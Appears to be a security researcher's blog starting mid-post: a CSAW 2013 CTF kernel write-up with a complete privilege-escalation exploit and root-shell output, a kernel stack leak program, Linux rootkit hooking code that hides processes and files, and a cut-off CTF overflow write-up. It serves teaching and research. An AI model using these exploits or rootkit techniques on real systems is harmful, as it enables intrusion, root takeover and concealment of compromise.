61     unsigned long consumers[MAX_CONSUMERS];
62     char *buf;
63     unsigned long size;
64     unsigned long seed;
65     struct list_head list;
66 };

…Or does it?

Recall how C buffer allocation and array indexing works.  The consumers array is allocated with size 255 elements.  By providing the value 255 as an array index, we are not referencing the last element, but instead one past the last element since C begins counting at the 0 index.

This means there is an off-by-one vulnerability in this code, and we can write an arbitrary 32-bit value immediately after the end of consumers in our buffer’s csaw_cbuf struct (or leak the existing value via CSAW_GET_CONSUMER).

Leveraging the Vulnerability

The actual impact of this vulnerability depends on exactly what data follows the consumers array and what control is afforded by manipulating it.

Interestingly enough, we notice that a pointer buf immediately follows the array and may be fully controlled or leaked with our bug:

60 struct csaw_buf {
61     unsigned long consumers[MAX_CONSUMERS];
62     char *buf;
63     unsigned long size;
64     unsigned long seed;
65     struct list_head list;
66 };

This buf pointer stores the location of the heap buffer associated with an allocated handle. In normal operation, the module would read and write to this pointer when getting or settings the contents of a shared buffer.  Instead, we can abuse the functionality of CSAW_WRITE_HANDLE to achieve an exploitation primitive:

240         case CSAW_WRITE_HANDLE:
241         {
242             struct write_args write_args;
243             struct csaw_buf *cbuf;
244             unsigned int i, authorized = 0;
245             unsigned long to_write;
246 
247             if ( copy_from_user(&write_args, argp, sizeof(write_args)) )
248                 return -EFAULT;
249 
250             cbuf = find_cbuf(write_args.handle);
251             if ( ! cbuf )
252                 return -EINVAL;
253 
254             for ( i = 0; i < MAX_CONSUMERS; i++ ) 255                 if ( current->pid == cbuf->consumers[i] )
256                     authorized = 1;
257 
258             if ( ! authorized )
259                 return -EPERM;
260 
261             to_write = min(write_args.size, cbuf->size);
262 
263             if ( copy_from_user(cbuf->buf, write_args.in, to_write) )
264                 return -EFAULT;
265 
266             bytes_written += to_write;
267 
268             break;
269         }

On line 263, user data is presumably safely copied into kernelspace using the copy_from_user() function.  However, with our newfound control over cbuf->buf, we may now point this write operation at any arbitrary location in the kernel, resulting in an arbitrary write primitive.

Mirroring this functionality in CSAW_READ_HANDLE, we may also leverage the bug to leak memory at any arbitrary location in the kernel, resulting in an arbitrary read primitive.

Circumventing Additional Obstacles

Although we’ve identified a vector by which to leverage our off-by-one as arbitrary read and write primitives, there are still additional obstacles to overcome before continuing with our exploit.

Specifically, the call to find_cbuf() on line 250 of CSAW_WRITE_HANDLE is troublesome:

250             cbuf = find_cbuf(write_args.handle);
251             if ( ! cbuf )
252                 return -EINVAL;

Looking at the implementation of find_cbuf(), we find something interesting:

172 struct csaw_buf *find_cbuf ( unsigned long handle )
173 {
174     struct csaw_buf *cbuf;
175 
176     list_for_each_entry ( cbuf, &csaw_bufs, list )
177         if ( handle == ((unsigned long)cbuf->buf ^ cbuf->seed) )
178             return cbuf;
179 
180     return NULL;
181 }

On lines 176-178, the function iterates through the linked list of allocated buffers and determines if the user-supplied handle matches that of an existing buffer.

Recall that handles are calculated as an XOR of the buffer address and 32 bits of randomness.  Thus, by corrupting an existing cbuf->buf address, all handle lookups for that buffer will subsequently fail since the calculation no longer matches our given handle.

Thus, in order to achieve our arbitrary read and write, we will need to first somehow leak the buffer’s seed value and recalculate the necessary handle to pass in.  Although seed can’t be directly leaked with the off-by-one bug, it is still possible to infer its value due to the nature of the calculation.

Thanks to the reversibility of the XOR operation, we can instead first leak the existing cbuf->buf value and XOR it with its given handle, obtaining the seed value as a result. Then, by XOR’ng the new cbuf->buf value with the leaked seed, a new valid handle may be calculated and passed in, satisfying the validation function and successfully returning the manipulated buffer struct.

With all obstacles satisfied and exploit primitives realized, it’s time to write an exploit.

Achieving Local Privilege Escalation

While there are numerous techniques to achieve privilege escalation, my solution to the challenge uses the common technique of simply overwriting and triggering a kernel function pointer with the address of a payload in userspace.

Despite an effort to const-ify (make read-only) all possible function pointers in the kernel, certain design patterns still leave opportunity open for easy exploitation.  By overwriting the aio_write function pointer within the ptmx_fops struct associated with /dev/ptmx, it is possible to subsequently trigger the pointer with a call to readv().  In addition to my solution, this specific technique may also be observed in the Enlightenment framework written by Brad Spengler (spender).

After corrupting and triggering the function pointer, kernel execution is then transferred to the following payload in userspace:

127 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
128 typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
129 
130 unsigned long commit_creds;
131 unsigned long prepare_kernel_cred;
132 unsigned long *cleanup;
133 
134 int get_root ( void *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos )
135 {
136     _commit_creds commit = (_commit_creds)commit_creds;
137     _prepare_kernel_cred prepare = (_prepare_kernel_cred)prepare_kernel_cred;
138 
139     *cleanup = 0;
140 
141     commit(prepare(0));
142 
143     return 0;
144 }

Kernel symbol resolution was enabled for this challenge, so determining the addresses of commit_creds, prepare_kernel_cred, and ptmx_fops was achieved simply by parsing the output of /proc/kallsyms.

Since the value of aio_read within ptmx_fops is by default 0, cleanup was relatively painless and only required writing the value 0 back to the corrupted pointer location.

Exploit

Download

/*
 * CSAW 2013 Michael Coppola solution
 */

#include 
#include 
#include 
#include <sys/ioctl.h>
#include 
#include 
#include 
#include <sys/uio.h>
#include <sys/utsname.h>

#define BUF_SIZE 0x100

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_HANDLE   CSAW_IOCTL_BASE+1
#define CSAW_READ_HANDLE    CSAW_IOCTL_BASE+2
#define CSAW_WRITE_HANDLE   CSAW_IOCTL_BASE+3
#define CSAW_GET_CONSUMER   CSAW_IOCTL_BASE+4
#define CSAW_SET_CONSUMER   CSAW_IOCTL_BASE+5
#define CSAW_FREE_HANDLE    CSAW_IOCTL_BASE+6
#define CSAW_GET_STATS      CSAW_IOCTL_BASE+7

struct alloc_args {
    unsigned long size;
    unsigned long handle;
};

struct free_args {
    unsigned long handle;
};

struct read_args {
    unsigned long handle;
    unsigned long size;
    void *out;
};

struct write_args {
    unsigned long handle;
    unsigned long size;
    void *in;
};

struct consumer_args {
    unsigned long handle;
    unsigned long pid;
    unsigned char offset;
};

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;
        int oldstyle = 0;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                        continue;
                                p = strrchr(sname, '_');
                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                        p = p - 4;
                                        while (p > (char *)sname && *(p - 1) == '_')
                                                p--;
                                        *p = '';
                                }
                        }
                }
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, "[+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;
fallback:
        uname(&ver);
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        sprintf(sname, "/boot/System.map-%s", ver.release);
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

unsigned long commit_creds;
unsigned long prepare_kernel_cred;
unsigned long *cleanup;

int get_root ( void *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos )
{
    _commit_creds commit = (_commit_creds)commit_creds;
    _prepare_kernel_cred prepare = (_prepare_kernel_cred)prepare_kernel_cred;

    *cleanup = 0;

    commit(prepare(0));

    return 0;
}

int main ( int argc, char **argv )
{
    int fd, pfd, ret;
    unsigned long handle, buf, seed, target, new_handle, ptmx_fops;
    unsigned long payload[4];
    struct alloc_args alloc_args;
    struct write_args write_args;
    struct consumer_args consumer_args;
    struct iovec iov;

    fd = open("/dev/csaw", O_RDONLY);
    if ( fd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    pfd = open("/dev/ptmx", O_RDWR);
    if ( pfd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    commit_creds = get_kernel_sym("commit_creds");
    if ( ! commit_creds )
    {
        printf("[-] commit_creds symbol not found, aborting\n");
        exit(1);
    }

    prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");
    if ( ! prepare_kernel_cred )
    {
        printf("[-] prepare_kernel_cred symbol not found, aborting\n");
        exit(1);
    }

    ptmx_fops = get_kernel_sym("ptmx_fops");
    if ( ! ptmx_fops )
    {
        printf("[-] ptmx_fops symbol not found, aborting\n");
        exit(1);
    }

    memset(&alloc_args, 0, sizeof(alloc_args));
    alloc_args.size = BUF_SIZE;

    ret = ioctl(fd, CSAW_ALLOC_HANDLE, &alloc_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    handle = alloc_args.handle;

    printf("[+] Acquired handle: %lx\n", handle);

    memset(&consumer_args, 0, sizeof(consumer_args));
    consumer_args.handle = handle;
    consumer_args.offset = 255;

    ret = ioctl(fd, CSAW_GET_CONSUMER, &consumer_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    buf = consumer_args.pid;

    printf("[+] buf = %lx\n", buf);

    seed = buf ^ handle;

    printf("[+] seed = %lx\n", seed);

    target = ptmx_fops + sizeof(void *) * 4;

    printf("[+] target = %lx\n", target);

    new_handle = target ^ seed;

    printf("[+] new handle = %lx\n", new_handle);

    memset(&consumer_args, 0, sizeof(consumer_args));
    consumer_args.handle = handle;
    consumer_args.offset = 255;
    consumer_args.pid = target;

    ret = ioctl(fd, CSAW_SET_CONSUMER, &consumer_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    buf = (unsigned long)&get_root;

    memset(&write_args, 0, sizeof(write_args));
    write_args.handle = new_handle;
    write_args.size = sizeof(buf);
    write_args.in = &buf;

    ret = ioctl(fd, CSAW_WRITE_HANDLE, &write_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    printf("[+] Triggering payload\n");

    cleanup = (unsigned long *)target;

    iov.iov_base = &iov;
    iov.iov_len = sizeof(payload);
    ret = readv(pfd, &iov, 1);

    if ( getuid() )
    {
        printf("[-] Failed to get root\n");
        exit(1);
    }
    else
        printf("[+] Got root!\n");

    printf("[+] Enjoy your shell...\n");
    execl("/bin/sh", "sh", NULL);

    return 0;
}

Proof of Concept

csaw@gibson:~$ ./solution 
[+] Resolved commit_creds to 0xc1073be0
[+] Resolved prepare_kernel_cred to 0xc1073e10
[+] Resolved ptmx_fops to 0xc1ac8ec0
[+] Acquired handle: da56b670
[+] buf = f6a84200
[+] seed = 2cfef470
[+] target = c1ac8ed0
[+] new handle = ed527aa0
[+] Triggering payload
[+] Got root!
[+] Enjoy your shell...
# id
uid=0(root) gid=0(root) groups=0(root)
#

Bonus Points

Although there were no actual bonus points to be awarded in the CTF, there is an additional information leak in the challenge that may have been utilized should symbol resolution be disabled (and you didn’t want to, ya know, use the arbitrary read).

Specifically, the CSAW_GET_STATS command contains the vulnerable code:

351         case CSAW_GET_STATS:
352         {
353             struct csaw_stats csaw_stats;
354 
355             csaw_stats.clients = clients;
356             csaw_stats.handles = handles;
357             csaw_stats.bytes_read = bytes_read;
358             csaw_stats.bytes_written = bytes_written;
359             strcpy(csaw_stats.version, DRIVER_VERSION);
360 
361             if ( copy_to_user(argp, &csaw_stats, sizeof(csaw_stats)) )
362                 return -EFAULT;
363 
364             break;
365         }

The information leak manifests itself in the version member of csaw_stats, where uninitialized kstack data is returned to the user.  This vulnerability may be identified upon further inspection of the struct definition:

 47 #define DRIVER_VERSION "CSAW SUCKiT v1.3.37"
...
 97 struct csaw_stats {
 98     unsigned long clients;
 99     unsigned long handles;
100     unsigned long bytes_read;
101     unsigned long bytes_written;
102     char version[40];
103 };

Note how version is allocated with size 40, while the DRIVER_VERSION string being strcpy()‘d is only 20 bytes long (including the terminating null byte).

The following code leaks out 20 bytes of uninitialized kstack data to userspace:

Download

/*
 * CSAW 2013 Michael Coppola leak uninitialized kstack
 */

#include 
#include 
#include 
#include <sys/ioctl.h>
#include 
#include 
#include 
#include <sys/uio.h>
#include <sys/utsname.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_GET_STATS      CSAW_IOCTL_BASE+7

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

int main ( int argc, char **argv )
{
    int fd, ret, i;
    struct csaw_stats csaw_stats;

    fd = open("/dev/csaw", O_RDONLY);
    if ( fd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    memset(&csaw_stats, 0, sizeof(csaw_stats));

    ret = ioctl(fd, CSAW_GET_STATS, &csaw_stats);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    for ( i = 0; i < 20; i++ )
        printf("%02hhx ", csaw_stats.version[20+i]);
    printf("\n");

    return 0;
}

And proof of concept:

csaw@gibson:~$ for i in {1..10}; do ./leak; done
00 ce 80 f6 14 00 00 00 28 00 00 00 30 79 62 b7 00 00 00 00 
40 c5 80 f6 14 00 00 00 28 00 00 00 30 39 6f b7 00 00 00 00 
00 c7 80 f6 14 00 00 00 28 00 00 00 30 a9 68 b7 00 00 00 00 
c0 b8 82 f4 14 00 00 00 28 00 00 00 30 b9 66 b7 00 00 00 00 
00 c7 80 f6 14 00 00 00 28 00 00 00 30 b9 68 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 89 64 b7 00 00 00 00 
c0 58 a6 f6 14 00 00 00 28 00 00 00 30 29 67 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 69 6c b7 00 00 00 00 
c0 58 a6 f6 14 00 00 00 28 00 00 00 30 39 69 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 e9 65 b7 00 00 00 00 
csaw@gibson:~$

Depending on the uninitialized data returned, it’s possible to leak pointers which may be used to calculate the base of one’s own kstack.  Using this information in the absence of known targets for a write primitive, a calculated write may then be performed into the kstack to subsequently gain code execution.

This technique, known as “stackjacking,” was presented by Dan Rosenberg and Jon Oberheide in 2011 as a technique to exploit a Linux kernel hardened by the grsecurity patchset.

Although I have written a modified version of my solution that utilizes stackjacking for local privilege escalation, I’ll leave its implementation as an exercise to the reader.

Summercon 2013: Hacking the Withings WS-30

This past weekend I presented Weighing in on Issues with “Cloud Scale” at Summercon 2013 (the title is totally a joke, btw). In the presentation, I talked about my experience reverse engineering and hacking the Withings WS-30 WiFi-enabled bathroom scale, a fun little embedded device running Thumb-2 code.

As mentioned during the talk, I’ve uploaded my slides, tools, and notes for download.  All of the tools I showed in the talk are fairly polished and ready for use in other projects.  There are also a good number of random crappy scripts that I used in one-off scenarios during the project but still may prove useful in some way.

I’ve included a copy of the WS-30 firmware (version 211) in the repo, as well as a copy with no header.  I’m also publishing my .idb so it may help others if they want to look at the code.  I’ve been annotating it for a number of months now so it should be fairly thorough.

If you have any feedback about the presentation or the project itself, let me know!

Slides: weighing-in-on-issues-with-cloud-scale.pdf

Tools/notes and everything else: https://github.com/mncoppola/ws30

Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM

Table of Contents

Introduction

A number of months ago, I added a new project to the redmine tracker github showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick.  I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits.  The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx.  A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim.  I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself.  I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics.  Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors.  Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine.  This can be observed by examining the following four functions:

  • hijack_start()
  • hijack_pause()
  • hijack_resume()
  • hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
    unsigned long o_cr0;

    // push $addr; ret
    memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
    *(unsigned long *)&n_code[1] = (unsigned long)new;

    memcpy(o_code, target, HIJACK_SIZE);

    o_cr0 = disable_wp();
    memcpy(target, n_code, HIJACK_SIZE);
    restore_wp(o_cr0);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

A small-sized shellcode buffer is initialized with a “push dword 0; ret” sequence, of which the pushed value is patched with the pointer of the hook-with function.  HIJACK_SIZE number of bytes (equivalent to the size of the shellcode) are copied from the target function and the prologue is then overwritten with the patched shellcode.  At this point, all function calls to the target function will redirect to our hook-with function.

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation.  The remaining hijack functions operate on this linked list.

hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);

            list_del(&sa->list);
            kfree(sa);
            break;
        }
}

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops.  This protection may be trivially circumvented however by setting the WP bit in the cr0 register to 0, disabling write protection on the CPU. Wikipedia’s article on control registers confirms this property:

BIT NAME FULL NAME DESCRIPTION
16 WP Write protect Determines whether the CPU can write to pages marked read-only

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations.  The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void )
{
    unsigned long cr0;

    preempt_disable();
    barrier();

    cr0 = read_cr0();
    write_cr0(cr0 & ~X86_CR0_WP);
    return cr0;
}

inline void restore_wp ( unsigned long cr0 )
{
    write_cr0(cr0);

    barrier();
    preempt_enable_no_resched();
}

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM.  For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture.  While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

    if ( (unsigned long)target % 4 == 0 )
    {
        // ldr pc, [pc, #0]; .long addr; .long addr
        memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[4] = (unsigned long)new;
        *(unsigned long *)&n_code[8] = (unsigned long)new;
    }
    else // Thumb
    {
        // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
        memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[8] = (unsigned long)new;
        target--;
    }

    memcpy(o_code, target, HIJACK_SIZE);

    memcpy(target, n_code, HIJACK_SIZE);
    cacheflush(target, HIJACK_SIZE);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions.  It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits.  However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory.  According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code.  The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size )
{
    flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
}

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors.  It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages.  A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification.  While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe.  By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called.  Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine.  However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion.  Moreso an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion.  Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

const struct file_operations ext3_dir_operations = {
    .llseek     = generic_file_llseek,
    .read       = generic_read_dir,
    .readdir    = ext3_readdir,
    .unlocked_ioctl = ext3_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = ext3_compat_ioctl,
#endif
    .fsync      = ext3_sync_file,
    .release    = ext3_release_dir,
};

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output.  To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

void *get_vfs_readdir ( const char *path )
{
    void *ret;
    struct file *filep;

    if ( (filep = filp_open(path, O_RDONLY, 0)) == NULL )
        return NULL;

    ret = filep->f_op->readdir;

    filp_close(filep, 0);

    return ret;
}

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
proc_readdir = get_vfs_readdir("/proc");
#endif
hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.

To perform the actual hiding of an objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
{
    int ret;

    o_proc_filldir = filldir;

    hijack_pause(proc_readdir);
    ret = proc_readdir(file, dirent, &n_proc_filldir);
    hijack_resume(proc_readdir);

    return ret;
}

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory.  This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_proc *hp;
    char *endp;
    long pid;

    pid = simple_strtol(name, &endp, 10);

    list_for_each_entry ( hp, &hidden_procs, list )
        if ( pid == hp->pid )
            return 0;

    return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
}

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide.  If a match is found, the callback returns 0 and the item is hidden from the directory listing.  Otherwise, the original proc_filldir() function is executed and its value returned.

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;

    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
}

MIT/LL CTF Writeup (Ticket Server)

This past weekend, I led team ” ” in the 2012 MIT Lincoln Lab CTF where we captured the flag for being the most offensive team, specifically, performing the most unique compromises of team + service.  No, literally, we won the flag:

Most_0wns_NEU_Space

Team ” “, from left to right: Michael Weissbacher, Amat Cama, Me, Travis Donnell, Ryan Rickert

One of the services we were tasked to install was a client-facing WordPress widget called Ticket that dispatched out to a binary backend.  In order to interact with the widget, users were required to first authenticate with the site using OpenID.

The widget kept a local database of users registered with the service in the text file /usr/share/wordpress/data.txt, where entries were stored in the format:

<display name>:<hashed WordPress password>:<CC number>

Users’ PII served as flags in the competition, so access to this data was coveted.  However, this part was simple as the database installed itself readable to the web root.  What we really wanted was a shell.

Adding and updating one’s own user entry in the database was handled by the following Ruby code listening as a Sinatra server on port 9494:

post '/ticket' do
  text = File.read("/usr/share/wordpress/data.txt")
  if (text.match(/^#{Regexp.escape(params['tuser'])}:#{Regexp.escape(params['tpassword'])}:.+$/)
     text.gsub!( /^#{Regexp.escape(params['tuser'])}:#{Regexp.escape(params['tpassword'])}:.+$/ , (params['tuser'] + ':' + params['tpassword'] + ':' + params['tccn'])))
  else
    text.concat(params['tuser'] + ':' + params['tpassword'] + ':' + params['tccn'] + "\n")
  end
  File.open("/usr/share/wordpress/data.txt", "w") {|file| file.write text}
  redirect url
end

Existing user:password:ccn tuples would be updated and new accounts would be appended to the end of the file.  Note that each field of data is arbitrarily controlled by the user.

Subsequent visits to the WordPress site would trigger the widget to perform a lookup in the text file for the currently logged in user, which was handled by a binary named ‘movie’. The resulting command was crafted like:

movie 'displayname:$H$ashedpassword'

where the display name was sanitized by the following regex:

preg_replace("/[^a-zA-Z0-9 ]+/", "", $name);

A match in the database would prompt the binary to return a generated token based on the user’s information.  However, what happens if we insert an unreasonably long entry in the database and then match it?

sysadmin@ctf-portal:~/ticket$ ./movie 'a:b'
Segmentation fault

Yup, memory corruption!  The application fails to check the length of the database entry before copying it onto the stack, resulting in a fairly straightforward stack-based overflow (which allows null bytes!).  Control over the return pointer / RIP was achieved at offset 1048:

sysadmin@ctf-portal:~/ticket$ gdb --quiet ./movie
Reading symbols from /home/sysadmin/ticket/movie...(no debugging symbols found)...done.
(gdb) run 'a:b'
Starting program: /home/sysadmin/ticket/movie 'a:b'
db5b35a4de8aa0f6

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400e75 in confirmation ()
(gdb) x/i $rip
=> 0x400e75 :	retq
(gdb) x/xg $rsp
